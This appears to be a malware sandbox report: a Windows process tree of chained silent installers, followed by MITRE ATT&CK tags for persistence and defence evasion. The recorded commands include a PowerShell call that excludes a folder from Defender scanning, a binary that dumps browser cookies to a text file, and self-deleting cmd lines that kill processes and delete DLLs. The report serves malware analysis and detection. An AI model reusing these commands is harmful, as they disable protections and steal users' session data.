C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:115⤵PID:15264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:115⤵PID:6908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2464 /prefetch:815⤵PID:14736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1684,16556172912818011607,2908588870974306704,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=6196 /prefetch:815⤵PID:15304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4api11yo3du\vict.exe"C:\Users\Admin\AppData\Local\Temp\4api11yo3du\vict.exe" /VERYSILENT /id=53513⤵PID:4736
-
C:\Users\Admin\AppData\Local\Temp\is-1IL3C.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-1IL3C.tmp\vict.tmp" /SL5="$20B04,870426,780800,C:\Users\Admin\AppData\Local\Temp\4api11yo3du\vict.exe" /VERYSILENT /id=53514⤵PID:10460
-
C:\Users\Admin\AppData\Local\Temp\is-RQSM8.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-RQSM8.tmp\wimapi.exe" 53515⤵PID:10188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pl3qw5ryvq2\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pl3qw5ryvq2\Setup3310.exe" /Verysilent /subid=57713⤵PID:10184
-
C:\Users\Admin\AppData\Local\Temp\is-3I8MU.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3I8MU.tmp\Setup3310.tmp" /SL5="$F04CE,802346,56832,C:\Users\Admin\AppData\Local\Temp\pl3qw5ryvq2\Setup3310.exe" /Verysilent /subid=57714⤵PID:14116
-
C:\Users\Admin\AppData\Local\Temp\is-DT81O.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DT81O.tmp\Setup.exe" /Verysilent15⤵PID:13928
-
C:\Users\Admin\AppData\Local\Temp\is-N5REL.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-N5REL.tmp\Setup.tmp" /SL5="$9075C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-DT81O.tmp\Setup.exe" /Verysilent16⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\PictureLAb.exe" /Verysilent17⤵PID:12932
-
C:\Users\Admin\AppData\Local\Temp\is-SFJKH.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFJKH.tmp\PictureLAb.tmp" /SL5="$C0D6E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\PictureLAb.exe" /Verysilent18⤵PID:12396
-
C:\Users\Admin\AppData\Local\Temp\is-LSVJ1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LSVJ1.tmp\Setup.exe" /VERYSILENT19⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\is-KI93J.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-KI93J.tmp\Setup.tmp" /SL5="$10FFC,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-LSVJ1.tmp\Setup.exe" /VERYSILENT20⤵PID:11584
-
C:\Users\Admin\AppData\Local\Temp\is-82N0N.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-82N0N.tmp\def.exe" /S /UID=lab21421⤵PID:10604
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\Delta.exe" /Verysilent17⤵PID:11428
-
C:\Users\Admin\AppData\Local\Temp\is-RSLN3.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-RSLN3.tmp\Delta.tmp" /SL5="$40F6A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\Delta.exe" /Verysilent18⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\is-BNDJ9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BNDJ9.tmp\Setup.exe" /VERYSILENT19⤵PID:3672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-BNDJ9.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit20⤵PID:15084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f21⤵
- Kills process with taskkill
PID:15012
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\zznote.exe" /Verysilent17⤵PID:9976
-
C:\Users\Admin\AppData\Local\Temp\is-BO7TT.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-BO7TT.tmp\zznote.tmp" /SL5="$40E2C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\zznote.exe" /Verysilent18⤵PID:6828
-
C:\Users\Admin\AppData\Local\Temp\is-GTSVG.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-GTSVG.tmp\jg4_4jaa.exe" /silent19⤵PID:6340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-JJK5T.tmp\hjjgaa.exe" /Verysilent17⤵PID:15236
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:12240
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:14456
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kqmcij31jso\nobkqd1gi3g.exe"C:\Users\Admin\AppData\Local\Temp\kqmcij31jso\nobkqd1gi3g.exe" /ustwo INSTALL13⤵PID:10832
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nobkqd1gi3g.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kqmcij31jso\nobkqd1gi3g.exe" & exit14⤵PID:14272
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nobkqd1gi3g.exe" /f15⤵
- Kills process with taskkill
PID:13496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wiox0i0eghi\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\wiox0i0eghi\chashepro3.exe" /VERYSILENT13⤵PID:13992
-
C:\Users\Admin\AppData\Local\Temp\is-CCS96.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-CCS96.tmp\chashepro3.tmp" /SL5="$60890,1478410,58368,C:\Users\Admin\AppData\Local\Temp\wiox0i0eghi\chashepro3.exe" /VERYSILENT14⤵PID:11736
-
-
-
C:\Users\Admin\AppData\Local\Temp\m2z4y55ybwp\app.exe"C:\Users\Admin\AppData\Local\Temp\m2z4y55ybwp\app.exe" /8-2313⤵PID:11464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Muddy-Mountain"14⤵PID:13680
-
-
C:\Program Files (x86)\Muddy-Mountain\7za.exe"C:\Program Files (x86)\Muddy-Mountain\7za.exe" e -p154.61.71.51 winamp-plugins.7z14⤵PID:10760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Muddy-Mountain\app.exe" -map "C:\Program Files (x86)\Muddy-Mountain\WinmonProcessMonitor.sys""14⤵PID:6788
-
C:\Program Files (x86)\Muddy-Mountain\app.exe"C:\Program Files (x86)\Muddy-Mountain\app.exe" -map "C:\Program Files (x86)\Muddy-Mountain\WinmonProcessMonitor.sys"15⤵PID:10164
-
-
-
C:\Program Files (x86)\Muddy-Mountain\7za.exe"C:\Program Files (x86)\Muddy-Mountain\7za.exe" e -p154.61.71.51 winamp.7z14⤵PID:8644
-
-
C:\Program Files (x86)\Muddy-Mountain\app.exe"C:\Program Files (x86)\Muddy-Mountain\app.exe" /8-2314⤵PID:5000
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\Delta.exe" /Verysilent2⤵PID:8272
-
C:\Users\Admin\AppData\Local\Temp\is-OFTR5.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-OFTR5.tmp\Delta.tmp" /SL5="$20540,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\Delta.exe" /Verysilent3⤵PID:8316
-
C:\Users\Admin\AppData\Local\Temp\is-8LGNC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-8LGNC.tmp\Setup.exe" /VERYSILENT4⤵PID:8596
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-8LGNC.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit5⤵PID:8504
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f6⤵
- Kills process with taskkill
PID:3544
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:8852
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\zznote.exe" /Verysilent2⤵PID:6736
-
C:\Users\Admin\AppData\Local\Temp\is-99UG7.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-99UG7.tmp\zznote.tmp" /SL5="$4041A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\zznote.exe" /Verysilent3⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\is-23I6M.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-23I6M.tmp\jg4_4jaa.exe" /silent4⤵PID:7468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-N12HS.tmp\hjjgaa.exe" /Verysilent2⤵PID:8088
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:7288
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:9088
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5628
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5008
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5008 -s 38402⤵
- Program crash
PID:9044
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6624
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8564
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{246caa32-9c40-0a44-8ffc-031aa84e9269}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8640
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"2⤵PID:8752
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:8796
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:8788
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb8,0xe0,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e201⤵PID:7236
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6032
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:8284
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8608
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\485A.tmp.exeC:\Users\Admin\AppData\Local\Temp\485A.tmp.exe1⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\579E.tmp.exeC:\Users\Admin\AppData\Local\Temp\579E.tmp.exe1⤵PID:7560
-
C:\Users\Admin\AppData\Local\Temp\5E55.tmp.exeC:\Users\Admin\AppData\Local\Temp\5E55.tmp.exe1⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\6E54.tmp.exeC:\Users\Admin\AppData\Local\Temp\6E54.tmp.exe1⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\7932.tmp.exeC:\Users\Admin\AppData\Local\Temp\7932.tmp.exe1⤵PID:4608
-
C:\Users\Admin\AppData\Local\Temp\7E64.tmp.exeC:\Users\Admin\AppData\Local\Temp\7E64.tmp.exe1⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\8663.tmp.exeC:\Users\Admin\AppData\Local\Temp\8663.tmp.exe1⤵PID:5680
-
C:\Users\Admin\AppData\Local\Temp\1461074104.exe"C:\Users\Admin\AppData\Local\Temp\1461074104.exe"2⤵PID:8796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8796 -s 2723⤵
- Program crash
PID:8012
-
-
-
C:\Users\Admin\AppData\Local\Temp\1074905031.exe"C:\Users\Admin\AppData\Local\Temp\1074905031.exe"2⤵PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\8CBD.tmp.exeC:\Users\Admin\AppData\Local\Temp\8CBD.tmp.exe1⤵PID:8416
-
C:\Users\Admin\AppData\Local\Temp\9143.tmp.exeC:\Users\Admin\AppData\Local\Temp\9143.tmp.exe1⤵PID:6928
-
C:\Users\Admin\AppData\Local\Temp\A623.tmp.exeC:\Users\Admin\AppData\Local\Temp\A623.tmp.exe1⤵PID:7532
-
C:\Users\Admin\AppData\Local\Temp\B5D4.tmp.exeC:\Users\Admin\AppData\Local\Temp\B5D4.tmp.exe1⤵PID:8700
-
C:\Users\Admin\AppData\Local\Temp\C2F4.tmp.exeC:\Users\Admin\AppData\Local\Temp\C2F4.tmp.exe1⤵PID:5104
-
C:\Users\Admin\AppData\Local\Temp\C2F4.tmp.exe"C:\Users\Admin\AppData\Local\Temp\C2F4.tmp.exe"2⤵PID:9964
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8340
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7708
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8712
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5308
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6356
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5872
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6664
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7952
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4692
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2776
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4524
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10216
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8640
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6548
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6548 -s 12642⤵
- Program crash
PID:680
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:14044
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffe20d06e00,0x7ffe20d06e10,0x7ffe20d06e201⤵PID:1364
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
2Web Service
1